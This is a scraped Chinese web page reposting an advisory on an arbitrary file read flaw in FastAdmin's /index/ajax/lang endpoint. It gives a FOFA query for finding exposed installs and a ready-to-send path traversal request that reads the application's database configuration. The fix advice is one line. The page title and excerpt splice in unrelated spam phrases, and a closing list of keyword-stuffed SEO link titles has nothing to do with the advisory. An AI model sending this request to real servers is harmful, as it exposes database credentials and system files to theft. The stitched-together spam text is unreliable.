当前位置: 首页 > news >正文

网站建设目标论文电子商务平台建设

网站建设目标论文,电子商务平台建设,潼南集团网站建设,在线制作电子签名0x01 产品简介 FastAdmin是一款基于PHPBootstrap的开源后台框架,专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,…

0x01 产品简介

FastAdmin是一款基于PHP+Bootstrap的开源后台框架,专为开发者精心打造。它基于ThinkPHP和Bootstrap两大主流技术构建,拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率,降低开发成本,同时确保后台系统的稳定性和安全性。

0x02 漏洞概述

FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"

0x04 漏洞复现

PoC

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 读取数据库配置

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.cadmedia.cn/news/8500.html

相关文章:

  • 2023年文职招聘岗位表网页优化seo公司
  • 音乐网站怎么建设公司推广渠道
  • 网站竞价推广都有哪些自己做一个网站
  • 河南股票配资网站建设做网站建设的公司
  • 浏阳网站建设卷云网络合肥优化排名推广
  • 网站怎么赚钱的搜索引擎优化的含义和目标
  • 兰州网站优化软件搜外
  • 国家知识产权商标注册查询官网seo顾问是什么
  • wordpress 换域名优化网站的步骤
  • 如何添加网站一诺网络推广公司
  • 网站设置专栏全网关键词指数查询
  • 怎么建立网站的流程百度推广售后
  • 百度自建站在线检测网站安全
  • 南昌格网科技郑州专业seo哪家好
  • net源码的网站建设步骤如何做到精准客户推广
  • 甘肃省省建设厅网站天眼查企业查询
  • 外贸网站建设 评价广州日新增51万人
  • 湖北建设工程信息网官网青岛网站优化公司
  • 专业网站建设价格大全by72777最新域名查询
  • 企业自助网站建设大数据培训课程
  • 网站建设服务杭州seo优化工具
  • 深圳专业的网站制作公司营销推广方式
  • 多元 集团 网站建设方案腾讯企点下载
  • 有限公司怎么注册公司杭州网站优化服务
  • 旅游网站毕业论文网站提交入口链接
  • 网站建设与规划专业关键词分析工具
  • 网站设计难吗怎样让自己的网站排名靠前
  • 网站建设的企业百度爱采购平台登录
  • 南京网站建设案例住房和城乡建设部官网
  • 邯郸又出现一例上海优化外包